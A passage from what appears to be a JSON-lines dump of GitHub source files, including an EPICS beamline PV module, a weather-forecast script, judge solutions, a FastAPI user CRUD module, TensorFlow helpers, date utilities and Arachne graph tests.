'wait_val':'9idbBNP:scan2.WCNT',\n 'pause':'9idbBNP:scan1.PAUS', 'abort':'9idbBNP:AbortScans.PROC', \n 'msg1d':'9idbBNP:scan1.SMSG',\n 'fname_saveData':'9idbBNP:saveData_fileName',\n 'filesys':'9idbBNP:saveData_fileSystem',\n 'subdir':'9idbBNP:saveData_subDir',\n 'nextsc':'9idbBNP:saveData_scanNumber',\n 'basename':'9idbBNP:saveData_baseName',\n \n }\n return pvs\n \ndef scan2RecordDetectorTrigerPVs():\n pvs = {'scan1':'9idbBNP:scan1.EXSC',\n 'eigerAcquire':'2iddEGR:cam1:Acquire',\n 'eigerFileCapture':'2iddEGR:HDF1:Capture'}\n return pvs\n \ndef getEiger():\n # create Eiger cam record\n e = eiger('2iddEGR:cam1:', '2iddEGR:HDF1:')\n return e\n \n# pvs = {'test1':'2idbleps:userTran2.CMTA', 'test2':'2idbleps:userTran2.CMTB', 'test3':'2idbleps:userTran2.CMTC',\n# 'test4':'2idbleps:userTran2.CMTD', 'test5':'2idbleps:userTran2.CMTE', 'test6':'2idbleps:userTran2.CMTF',\n# 'test7':'2idbleps:userTran2.CMTG'}\n\n\ndef getPVobj():\n pvObjs = {}\n pvs = definePVs()\n for k, v in pvs.items():\n if 'Record' not in k:\n pv_obj = pvObject(v, k, onchange_callback=True if '9idbBNP:scan2.CPT'==v else False)\n pvObjs.update({k: pv_obj})\n else:\n pvObjs.update({k:epics.devices.Scan(v)})\n return 
pvObjs\n","repo_name":"AdvancedPhotonSource/bnpTools","sub_path":"bnpGUI/pvObjects.py","file_name":"pvObjects.py","file_ext":"py","file_size_in_byte":6211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5874808279","text":"from pathlib import Path\nfrom geopy.geocoders import Nominatim\nimport requests\nimport pandas as pd\n\n\ndef get_forecast(city=\"Pittsburgh\"):\n \"\"\"\n Retrieves the weather forecast for a specified city.\n\n This function uses the Nominatim geocoding service to obtain the latitude and longitude\n coordinates of the specified city. It then constructs a URL to access the weather forecast\n data using the National Weather Service (NWS) API. The API response is processed to extract\n the forecast periods, and the forecast for the \"Tonight\" period is returned.\n\n :param city: The name of the city for which to retrieve the weather forecast (default: Pittsburgh).\n :type city: str\n :return: A dictionary containing the weather forecast for the \"Tonight\" period.\n :rtype: dict\n \"\"\"\n\n geolocator = Nominatim(user_agent=\"ModernProgramming\")\n location = geolocator.geocode(city)\n URL = f\"https://api.weather.gov/points/{location.latitude},{location.longitude}\"\n response = requests.get(URL)\n response = requests.get(response.json()[\"properties\"][\"forecast\"])\n periods = response.json()[\"properties\"][\"periods\"]\n for period in periods:\n if period[\"name\"] == \"Tonight\":\n break\n\n return period\n\n\ndef main():\n \"\"\"\n Retrieves the weather forecast for a specified city and updates a DataFrame and README file.\n\n This function calls the `get_forecast` function to retrieve the weather forecast for a city\n (defaulting to Pittsburgh). It then updates a DataFrame containing forecast information. If\n a DataFrame file named \"weather.pkl\" exists, it loads the DataFrame; otherwise, it initializes\n a new DataFrame. The retrieved forecast information is appended to the DataFrame, and duplicate\n entries are removed. The updated DataFrame is saved back to the \"weather.pkl\" file.\n\n Additionally, this function generates a README markdown file for a GitHub repository. It includes\n badges indicating the status of repository workflows and presents the nightly forecast for Pittsburgh.\n The forecast information is formatted using the DataFrame's `to_markdown` method. Finally, a copyright\n notice is added to the README file.\n\n :return: None\n \"\"\"\n\n period = get_forecast()\n file = \"weather.pkl\"\n\n if Path(file).exists():\n df = pd.read_pickle(file)\n else:\n df = pd.DataFrame(columns=[\"Start Date\", \"End Date\", \"Forecast\"])\n\n datum = {\n \"Start Date\": period[\"startTime\"],\n \"End Date\": period[\"endTime\"],\n \"Forecast\": period[\"detailedForecast\"],\n }\n df = pd.concat([df, pd.DataFrame([datum])], ignore_index=True)\n\n df = df.drop_duplicates()\n df.to_pickle(file)\n\n # sort repositories\n file = open(\"README.md\", \"w\")\n file.write(\n \"![Status](https://github.com/icaoberg/\"\n + \"python-get-forecast/actions/workflows/build.yml/badge.svg)\\n\"\n )\n file.write(\n \"![Status](https://github.com/icaoberg/\"\n + \"python-get-forecast/actions/workflows/pretty.yml/badge.svg)\\n\"\n )\n file.write(\"# Pittsburgh Nightly Forecast\\n\\n\")\n file.write(df.to_markdown(tablefmt=\"github\"))\n file.write(\n \"\\n\\n---\\nCopyright © 2022-2023 Pittsburgh Supercomputing \"\n + \"Center. 
All Rights Reserved.\"\n )\n file.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"icaoberg/python-get-forecast","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1760673856","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfor i in range(0, int(input())):\n BONUS = int(input())\n A1, D1, L1 = input().split()\n A2, D2, L2 = input().split()\n\n G1 = ((int(A1) + int(D1)) / 2)\n G2 = ((int(A2) + int(D2)) / 2)\n if int(L1) % 2 == 0:\n G1 += BONUS\n if int(L2) % 2 == 0:\n G2 += BONUS\n if G1 == G2:\n print('Emapate')\n elif G1 > G2:\n print('Dabriel')\n else:\n print('Guarte')\n","repo_name":"quatroka/urionlinejudge","sub_path":"iniciante/python/2221.py","file_name":"2221.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"21487700161","text":"class Solution(object):\n def dfs(self,nums, prev):\n if not nums: return 1\n \n res = 0\n for i, num in enumerate(nums):\n if i and num == nums[i - 1]: continue\n s = num + prev\n if prev < 0 or int(sqrt(s))**2 == s:\n res += self.dfs(nums[:i] + nums[i+1:], num)\n return res\n def numSquarefulPerms(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n \n nums = sorted(nums)\n if not nums: return 0\n return self.dfs(nums, -1) \n","repo_name":"bontu-fufa/squid-game","sub_path":"numSquarefulPerms.py","file_name":"numSquarefulPerms.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43369400248","text":"# OPath\nfrom models.user_api_model import UserRegister\nfrom models.db_model import UserDB\nfrom utils.hashing import Hash\n# SQLAlchemy\nfrom sqlalchemy.orm import Session\n\n# Pydantic\nfrom pydantic import EmailStr\n\n# FastAPI\nfrom fastapi import HTTPException, status\n\n\ndef create(user: UserRegister, db: Session):\n user.password = Hash.hash_password(user.password)\n\n new_user = UserDB(**user.dict())\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n\n return new_user\n\n\ndef get_all(db: Session):\n users = db.query(UserDB).all()\n return users\n\n\ndef get(id: int, db: Session):\n user = db.query(UserDB).filter(\n UserDB.id == id).first()\n\n if not user:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND, \n detail=\"This user doesn't exist!\"\n )\n \n return user\n\n\ndef delete(id: int, db: Session):\n\n user = db.query(UserDB).filter(UserDB.id == id)\n\n if not user.first():\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"This user doesn't exist!\"\n ) \n\n user.delete(synchronize_session=False)\n db.commit()\n\n return None\n\n\ndef update(\n id: int,\n first_name: str,\n last_name: str,\n email: EmailStr,\n db: Session\n ):\n\n user = db.query(UserDB).filter(\n UserDB.id == id\n )\n\n if not user.first():\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=\"This user doesn't exist!\"\n )\n \n if not first_name: first_name = user.first().first_name\n if not last_name: last_name = user.first().last_name\n if not email: email = user.first().email\n\n user.update(\n {\n UserDB.first_name: first_name,\n UserDB.last_name: last_name, \n UserDB.email: email\n }\n )\n\n db.commit()\n\n return 
None","repo_name":"alec-ibp/twitter-api","sub_path":"twitter-api/repository/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"9489770300","text":"import itertools\nimport math\nN = int(input())\nS = input()\nl = len(S)\n\n\n#oxooxoxoox\n#s → 1 w→-1\ntemp = []\nfor c in S:\n if c == \"o\":\n temp.append(1)\n else:\n temp.append(-1)\n\nS = temp\n\nflag = False\nfor i in [1,-1]: # 1匹目\n for j in [1,-1]: #2匹目\n nums = [i,j]\n temp = i * j\n for k in range(1,N-1):\n nums.append(temp * S[k])\n temp = nums[k] * nums[k + 1]\n if temp * nums[0] == S[-1] and nums[-1] * nums[0] * nums[1] == S[0]:\n flag = True\n break\n if flag:\n break\n\nif flag:\n for num in nums:\n if num == -1:\n print(\"W\",end=\"\")\n else:\n print(\"S\", end=\"\")\n\nelse:\n print(-1)\n\n","repo_name":"lilium513/competition_programing","sub_path":"69ARC/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22012034892","text":"import csv\n\ndef read_csv_file(filename):\n try:\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n data = [row for row in csv_reader]\n except FileNotFoundError:\n print('Error, file specified not found in current directory!')\n return None\n return data\n\n\ndef validate_keys(data, kwargs):\n columns_in_table = data[0]\n for key in kwargs.keys():\n if key not in columns_in_table:\n return False\n return True\n\n\ndef are_arguments_in_current_row(row, kwargs):\n for arg_value in kwargs.values():\n if arg_value not in row:\n return False\n return True\n\n\ndef filter(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n matched_rows = []\n are_kwargs_valid = validate_keys(csv_data, kwargs)\n if are_kwargs_valid:\n for row in csv_data[1:]:\n is_row_approved = [\n are_arguments_in_current_row(row, kwargs),\n full_name_startswith(row, full_name__startswith),\n email_contains(row, email__contains),\n greater_than(row, salary__gt),\n less_than(row, salary__lt),\n ]\n if all(is_row_approved):\n matched_rows.append(row)\n if order_by == 'salary':\n order_data_by(matched_rows)\n return matched_rows\n\n\ndef count(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n data = filter(csv_data, full_name__startswith, email__contains,\n salary__gt, salary__lt, order_by, **kwargs)\n return len(data)\n\n\ndef first(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n data = filter(csv_data, full_name__startswith, email__contains,\n salary__gt, salary__lt, order_by, **kwargs)\n if data:\n return data[0]\n return None\n\n\ndef last(csv_data, full_name__startswith=None, email__contains=None,\n salary__gt=None, salary__lt=None, order_by=None, **kwargs):\n data = filter(csv_data, full_name__startswith, email__contains,\n salary__gt, salary__lt, order_by, **kwargs)\n if data:\n return data[-1]\n return None\n\n\ndef full_name_startswith(row, full_name__startswith):\n if not full_name__startswith:\n return True\n first_name = row[0]\n return True if first_name[:len(full_name__startswith)] == full_name__startswith else False\n\n\ndef email_contains(row, email__contains):\n if not email__contains:\n return True\n email = row[3]\n 
return True if email[len(email)-len(email__contains):] == email__contains else False\n\n\ndef greater_than(row, salary__gt):\n if not salary__gt:\n return True\n return True if int(row[-1]) > salary__gt else False\n\n\ndef less_than(row, salary__lt):\n if not salary__lt:\n return True\n return True if int(row[-1]) < salary__lt else False\n\n\ndef order_data_by(matched_rows):\n matched_rows.sort(key=lambda row: int(row[-1]))\n\n\ndef print_result(results):\n for row in results:\n for field in row:\n print(field, end=', ')\n print('')\n\n\nif __name__ == '__main__':\n data = read_csv_file('example_data.csv')\n # print(data)\n print_result(filter(data, salary__gt=1000, salary__lt=5000, order_by='salary'))","repo_name":"SashoStoichkovArchive/HB_TASKS","sub_path":"projects/week03/13_03_2019/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8373514380","text":"import inspect\nimport os\n\nimport tensorflow as tf\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nimport pandas as pd\n\n\"\"\"Argument parsing\"\"\"\n\n\ndef list_global_variables(condition=None, filter_underscore=True, **kwargs):\n global globals\n\n def cond(k):\n if k == \"list_global_variables\":\n return False\n if filter_underscore and k.startswith('_'):\n return False\n if condition is not None:\n return condition(k)\n return True\n\n return list(filter(cond, globals().keys()))\n\n\ndef list_global_constants(condition=None, filter_underscore=True, **kwargs):\n upper = set('ABCDEFGHIJKLMNOPQRSTUVWXYZ_1234567890')\n\n def cond(k):\n if condition is not None and not condition(k):\n return False\n if not all(c in upper for c in k):\n return False\n return True\n\n return list_global_variables(condition=cond, filter_underscore=filter_underscore, **kwargs)\n\n\ndef filter_dict_by_value(condition, d):\n return {k: v for k, v in d.items() if condition(v)}\n\n\ndef filter_dict_by_key(condition, d):\n return {k: v for k, v in d.items() if condition(k)}\n\n\ndef list_valid_args(func):\n return list(inspect.signature(func).parameters.keys())\n\n\ndef retrieve_global_variables(keys=None, lower=True, **kwargs):\n if keys is not None:\n d = {k: eval(k) for k in keys}\n else:\n d = {k: eval(k) for k in list_global_variables(**kwargs)}\n return {k.lower(): v for k, v in d.items()}\n\n\ndef retrieve_global_valid_constants(func):\n valid_args = list_valid_args(func)\n constants = list_global_constants(condition=lambda k: not callable(eval(k)))\n keys = [k for k in constants if k.lower() in valid_args]\n return retrieve_global_variables(keys)\n\n\ndef resolve_global_constants(d, **kwargs):\n constants = list_global_constants(**kwargs)\n for k in intersect([k.lower() for k in constants], d.keys()):\n d[k] = eval(k.upper())\n return d\n\n\ndef dict_update(d, d_new):\n for k in set(d).intersection(set(d_new)):\n d[k] = d_new\n return d\n\n\ndef dict_key_lower(d):\n return {k.lower(): v for k, v in d.items()}\n\n\ndef dict_key_upper(d):\n return {k.upper(): v for k, v in d.items()}\n\n\ndef intersect(*keys):\n if len(keys) == 0:\n return []\n if len(keys) == 1:\n return keys\n s = set(keys[0])\n for key in keys[1:]:\n s = s.intersection(set(key))\n return s\n\n\ndef retrieve_args_global_dict(func, d):\n global globals\n\n global_settings = list_global_variables()\n settings = set(d).union(set([k.lower() for k in global_settings]))\n args_dict = dict()\n for k in 
set(list_valid_args(func)).intersection(settings):\n if k.upper() in global_settings:\n args_dict[k] = eval(k.upper())\n elif d.get(k, None) is not None:\n args_dict[k] = d[k]\n return args_dict\n\n\n\"\"\"Hardware configuration\"\"\"\n\n\ndef solve_hardware():\n try:\n tpu = tf.distribute.cluster_resolver.TPUClusterResolver()\n tf.config.experimental_connect_to_cluster(tpu)\n tf.tpu.experimental.initialize_tpu_system(tpu)\n strategy = tf.distribute.TPUStrategy(tpu)\n print('Running on TPUv3-8')\n except:\n tpu = None\n strategy = tf.distribute.get_strategy()\n print('Running on GPU with mixed precision')\n\n batch_size = 16 * strategy.num_replicas_in_sync\n\n print('Number of replicas:', strategy.num_replicas_in_sync)\n print('Batch size: %.i' % batch_size)\n\n return tpu, strategy\n\n\ndef seed_everything(seed):\n tf.random.set_seed(seed)\n # np.random.set_state(seed)\n\n\ndef plot_history_metric(history, metric, f_best=np.argmax, ylim=None, yscale=None, yticks=None):\n # https://www.kaggle.com/code/markwijkhuizen/rsna-convnextv2-training-tensorflow-tpu?scriptVersionId=116484001\n plt.figure(figsize=(20, 10))\n\n values = history[metric]\n N_EPOCHS = len(values)\n val = 'val' in ''.join(history.keys())\n # Epoch Ticks\n if N_EPOCHS <= 20:\n x = np.arange(1, N_EPOCHS + 1)\n else:\n x = [1, 5] + [10 + 5 * idx for idx in range((N_EPOCHS - 10) // 5 + 1)]\n\n x_ticks = np.arange(1, N_EPOCHS + 1)\n\n # Validation\n if val:\n val_values = history[f'val_{metric}']\n val_argmin = f_best(val_values)\n plt.plot(x_ticks, val_values, label=f'val')\n\n # summarize history for accuracy\n plt.plot(x_ticks, values, label=f'train')\n argmin = f_best(values)\n plt.scatter(argmin + 1, values[argmin], color='red', s=75, marker='o', label=f'train_best')\n if val:\n plt.scatter(val_argmin + 1, val_values[val_argmin], color='purple', s=75, marker='o', label=f'val_best')\n\n plt.title(f'Model {metric}', fontsize=24, pad=10)\n plt.ylabel(metric, fontsize=20, labelpad=10)\n\n if ylim:\n plt.ylim(ylim)\n\n if yscale is not None:\n plt.yscale(yscale)\n\n if yticks is not None:\n plt.yticks(yticks, fontsize=16)\n\n plt.xlabel('epoch', fontsize=20, labelpad=10)\n plt.tick_params(axis='x', labelsize=8)\n plt.xticks(x, fontsize=16) # set tick step to 1 and let x axis start at 1\n plt.yticks(fontsize=16)\n\n plt.legend(prop={'size': 10})\n plt.grid()\n plt.show()\n\n\ndef solve_folder_path(base):\n if not os.path.exists(base):\n os.makedirs(base)\n return base\n for i in range(1000):\n folder = os.path.join(base, f'{i:04d}')\n if not os.path.exists(folder):\n os.makedirs(folder)\n return folder\n\n\ndef plot_training_results_2(folder=\"./exp\"):\n folder = solve_folder_path(folder)\n\n global FOLDS\n\n \"\"\"\n Plot training results\n \"\"\"\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n\n fig = plt.figure(figsize=(32, 10), constrained_layout=True)\n gs = gridspec.GridSpec(2, FOLDS, figure=fig)\n\n for fold_idx in range(FOLDS):\n tmp_log_dir = os.path.join(folder, f\"fold{fold_idx}_logs/version_0\")\n metrics = pd.read_csv(os.path.join(tmp_log_dir, 'metrics.csv'))\n\n train_acc = metrics['train_f1'].dropna().reset_index(drop=True)\n valid_acc = metrics['valid_f1'].dropna().reset_index(drop=True)\n\n ax = fig.add_subplot(gs[0, fold_idx])\n ax.plot(train_acc, color=\"r\", marker=\"o\", label='train/f1')\n ax.plot(valid_acc, color=\"b\", marker=\"x\", label='valid/f1')\n ax.set_xlabel('Epoch', fontsize=24)\n ax.set_ylabel('F1', fontsize=24)\n ax.set_title(f'fold {fold_idx}')\n 
ax.legend(loc='lower right', fontsize=18)\n\n        train_loss = metrics['train_loss'].dropna().reset_index(drop=True)\n        valid_loss = metrics['valid_loss'].dropna().reset_index(drop=True)\n\n        ax = fig.add_subplot(gs[1, fold_idx])\n        ax.plot(train_loss, color=\"r\", marker=\"o\", label='train/loss')\n        ax.plot(valid_loss, color=\"b\", marker=\"x\", label='valid/loss')\n        ax.set_ylabel('Loss', fontsize=24)\n        ax.set_xlabel('Epoch', fontsize=24)\n        ax.legend(loc='upper right', fontsize=18)\n\n\ndef display_result(history, model, i=0):\n    try:\n        history = history.history\n    except AttributeError:\n        # history is already a plain dict of metric lists\n        pass\n\n    os.makedirs('res', exist_ok=True)\n\n    with open(f'res/report.txt', 'w+') as f:\n        f.write(f\"acc: {max(history['val_acc'])}\\n\\n\")\n        model.summary(print_fn=lambda x: f.write(x + '\\n'))\n\n    model.save_weights(os.path.join('res', \"model.h5\"))\n\n    print(f\"Acc: {100 * max(history['val_acc'])}\")\n\n    plt.plot(history['acc'])\n    plt.plot(history['val_acc'])\n    plt.title('model accuracy')\n    plt.ylabel('accuracy')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'test'], loc='upper left')\n    plt.show()\n\n    plt.plot(history['loss'])\n    plt.plot(history['val_loss'])\n    plt.title('model loss')\n    plt.ylabel('loss')\n    plt.xlabel('epoch')\n    plt.legend(['train', 'test'], loc='upper left')\n    plt.show()\n\n\ndef inspect_distribution(m):\n    from keract import get_activations\n\n    # tf.random.normal expects the shape as a single sequence argument\n    image = tf.random.normal((128, 380, 380, 3), mean=0.5, stddev=0.5)\n\n    for layer in m.layers:\n        act = get_activations(\n            m, image,\n            layer_names=layer.name,\n            output_format='simple',\n            nested=True,\n            auto_compile=True\n        )\n","repo_name":"1712catfish/keras-classification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25404181456","text":"def majority(a, code):\n    return len(list(filter(lambda x: x == code, a))) * 2 > len(a)\n\ndef findmajority(a):\n    code, count = None, 0\n    for number in a:\n        if count == 0:\n            code, count = number, 1\n        elif number == code:\n            count += 1\n        else:\n            count -= 1\n    return code if majority(a, code) else -1\n\ndef main():\n    k, n = map(int, input().split())\n    print(' '.join(str(findmajority(list(map(int, input().split())))) for _ in range(k)))\n\nif __name__ == '__main__':\n    main()\n","repo_name":"jyothsana-GitHub/Assignment","sub_path":"Maj.py","file_name":"Maj.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30690171256","text":"import datetime\nfrom dateutil.relativedelta import relativedelta\n\ndef getShortDateString(date):\n    date = date.split()\n    months = {\"Jan\": 1, \"Feb\": 2, \"Mar\": 3, \"Apr\": 4, \"May\": 5, \"Jun\": 6,\n              \"Jul\": 7, \"Aug\": 8, \"Sep\": 9, \"Oct\": 10, \"Nov\": 11, \"Dec\": 12}\n    m = months.get(date[0], 0)\n    if len(date) == 2:\n        y = int(date[1])\n        d = 1\n    else:\n        y = int(date[2])\n        d = int(date[1].split(\",\")[0])\n    return datetime.datetime(y, m, d).strftime('%Y-%m-%d')\n\ndef getLongDateString(date):\n    date = date.split()\n    months = {\"January\": 1, \"February\": 2, \"March\": 3, \"April\": 4, \"May\": 5,\n              \"June\": 6, \"July\": 7, \"August\": 8, \"September\": 9,\n              \"October\": 10, \"November\": 11, \"December\": 12}\n    m = months.get(date[0], 0)\n    if len(date) == 2:\n        y = int(date[1])\n        d = 1\n    else:\n        y = int(date[2])\n        d = int(date[1].split(\",\")[0])\n    return datetime.datetime(y, m, d).strftime('%Y-%m-%d')\n\ndef toString(date):\n    return date.strftime('%Y-%m-%d')\n\ndef subtractYears(date, years):\n    return date - relativedelta(years=years)\n\ndef getFullDashedDateString(date):\n    y, m, d = [int(\"\".join(x.split())) for x in date.split('-')]\n    return datetime.datetime(y, m, d).strftime('%Y-%m-%d')\n\ndef getDashedDateTime(date):\n    y, m, d = [int(\"\".join(x.split())) for x in date.split('-')]\n    return datetime.datetime(y, m, d)\n\ndef greaterThanDate(dateA, dateB):\n    dtA = getDashedDateTime(dateA)\n    dtB = getDashedDateTime(dateB)\n    return dtA > dtB\n\ndef greaterThanOrEqualDate(dateA, dateB):\n    dtA = getDashedDateTime(dateA)\n    dtB = getDashedDateTime(dateB)\n    return dtA >= dtB\n\ndef equalDate(dateA, dateB):\n    dtA = getDashedDateTime(dateA)\n    dtB = getDashedDateTime(dateB)\n    return dtA == dtB","repo_name":"DaVinciTachyon/FinalYearProject","sub_path":"dateUtil.py","file_name":"dateUtil.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28361048354","text":"#coding=utf-8\n'''\nCreated on 2017.03.03\nTopQuant Deep Learning Case Study\nExcerpted from the TopQuant deep-learning training course series\n@ www.TopQuant.vip  www.ziwang.com\nTopQuant open-source quantitative team\n\n'''\n\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport tflearn\n#import sklearn\nfrom sklearn.model_selection import train_test_split\n#from __future__ import absolute_import, division, print_function\nimport matplotlib.pyplot as plt\n\n#-----------------\n\"\"\" Linear Regression Example \"\"\"\n\n\n\n# Regression data\n#X = [3.3,4.4,5.5,6.71,6.93,4.168,9.779,6.182,7.59,2.167,7.042,10.791,5.313,7.997,5.654,9.27,3.1]\n#Y = [1.7,2.76,2.09,3.19,1.694,1.573,3.366,2.596,2.53,1.221,2.827,3.465,1.65,2.904,2.42,2.94,1.3]\nfss='data/p100.csv'\ndf=pd.read_csv(fss)\nprint(df.tail())\n#X,Y=df['x'].values,df['y'].values\n#X,Y=df['x'].tolist,df['y'].tolist\nX,Y=list(df['x'].values),list(df['y'].values)\n#print(X)\nprint(type(X))\n# Linear Regression graph\ninput_ = tflearn.input_data(shape=[None])\nlinear = tflearn.single_unit(input_)\nregression = tflearn.regression(linear, optimizer='sgd', loss='mean_square',\n                                metric='R2', learning_rate=0.001)\nm = tflearn.DNN(regression, tensorboard_verbose=3)\n#m = tflearn.DNN(regression,logdir='/tmp/tflearn_logs', tensorboard_verbose=3)\n#m = tflearn.Trainer(train_ops=m_op,tensorboard_dir='/tmp/tflearn_logs/',tensorboard_verbose=2)\n     # Training for 1000 epochs.\nm.fit(X, Y, n_epoch=1000, show_metric=True, snapshot_epoch=False)\n\nprint(\"\\nRegression result:\")\nprint(\"Y = \" + str(m.get_weights(linear.W)) +\n      \"*X + \" + str(m.get_weights(linear.b)))\n\nprint(\"\\nTest prediction for x = 3.2, 3.3, 3.4:\")\nys2=m.predict(X)\n#print(m.predict([3.2, 3.3, 3.4]))\n# should output (close, not exact) y = [1.5315033197402954, 1.5585315227508545, 1.5855598449707031]\n\n#8.1\nprint('\\n#7,plot')\nplt.plot(X,Y, 'ro', label='Original data')\n#8.2\n\nplt.plot(X, ys2, 
label='ln_model')\n#\n#8.3\nplt.legend()\nplt.show()\n\n\n","repo_name":"dumpinfo/TsBook","sub_path":"零起点Tensorflow快速入门tf_demo/tf904trx.py","file_name":"tf904trx.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"3154653450","text":"from base_test import ArkoudaTest\nimport arkouda as ak\nimport arachne as ar\nimport networkx as nx\n\nclass AlgorithmTest(ArkoudaTest):\n \"\"\"Test graph algorithm methods.\"\"\"\n def build_undirected_graph(self):\n \"\"\"Builds undirected and weighted graphs in both Arachne and NetworkX for tests.\"\"\"\n src_list = [2,5,2,3,3,3,3,2,3,4,5,5,5,5,5,5,7,8,9,9,8,9 ,10,10,10,24,25,25]\n dst_list = [1,0,0,0,3,3,3,3,4,3,5,2,2,2,2,7,8,9,8,8,5,10,7 ,7 ,7 ,24,26,27]\n wgt_list = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1 ,1 ,1 ,1 ,10,20]\n src = ak.array(src_list)\n dst = ak.array(dst_list)\n wgt = ak.array(wgt_list)\n\n ar_graph = ar.Graph()\n ar_graph.add_edges_from(src,dst)\n ar_graph_weighted = ar.Graph()\n ar_graph_weighted.add_edges_from(src,dst,wgt)\n\n ebunch = list(zip(src_list,dst_list))\n nx_graph = nx.Graph()\n nx_graph.add_edges_from(ebunch)\n ebunchw = list(zip(src_list,dst_list,wgt_list))\n nx_graph_weighted = nx.Graph()\n nx_graph_weighted.add_weighted_edges_from(ebunchw)\n\n return ar_graph, nx_graph, ar_graph_weighted, nx_graph_weighted\n\n def build_directed_graph(self):\n \"\"\"Builds directed and weighted graphs in both Arachne and NetworkX for tests.\"\"\"\n src_list = [2,5,2,3,3,3,3,2,3,4,5,5,5,5,5,5,7,8,9,9,8,9 ,10,10,10,24,25,25]\n dst_list = [1,0,0,0,3,3,3,3,4,3,5,2,2,2,2,7,8,9,8,8,5,10,7 ,7 ,7 ,24,26,27]\n wgt_list = [1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1 ,1 ,1 ,1 ,10,20]\n src = ak.array(src_list)\n dst = ak.array(dst_list)\n wgt = ak.array(wgt_list)\n\n ar_di_graph = ar.DiGraph()\n ar_di_graph.add_edges_from(src,dst)\n ar_di_graph_weighted = ar.DiGraph()\n ar_di_graph_weighted.add_edges_from(src,dst,wgt)\n\n ebunch = list(zip(src_list,dst_list))\n nx_di_graph = nx.DiGraph()\n nx_di_graph.add_edges_from(ebunch)\n ebunchw = list(zip(src_list,dst_list,wgt_list))\n nx_di_graph_weighted = nx.DiGraph()\n nx_di_graph_weighted.add_weighted_edges_from(ebunchw)\n\n return ar_di_graph, nx_di_graph, ar_di_graph_weighted, nx_di_graph_weighted\n\n def test_undirected_bfs_layers(self):\n \"\"\"Tests Arachne bfs_layers() and compares against NetworkX.\"\"\"\n # Read in graphs with Arachne and NetworkX.\n ar_graph, nx_graph,_,_ = self.build_undirected_graph()\n\n # Extract vertices to launch breadth-first search from each.\n vertices = ar_graph.nodes().to_list()\n\n ar_all_layers = []\n nx_all_layers = []\n for root in vertices:\n # Compute breadth-first search with Arachne.\n ar_layers = ar.bfs_layers(ar_graph, root).to_list()\n\n # Compute breadth-first search with NetworkX.\n nx_layer_dict = dict(enumerate(nx.bfs_layers(nx_graph, root)))\n nx_layers = [-1] * len(ar_layers)\n for layer,vertices_at_layer in nx_layer_dict.items():\n for vertex in vertices_at_layer:\n nx_layers[vertices.index(vertex)] = layer\n\n # Add both to corresponding layers tracker.\n ar_all_layers.append(ar_layers)\n nx_all_layers.append(nx_layers)\n\n return self.assertEqual(ar_all_layers, nx_all_layers)\n \n def test_directed_bfs_layers(self):\n \"\"\"Tests Arachne bfs_layers() and compares against NetworkX.\"\"\"\n # Read in graphs with Arachne and NetworkX.\n ar_graph, nx_graph,_,_ = self.build_directed_graph()\n\n # Extract vertices to launch breadth-first 
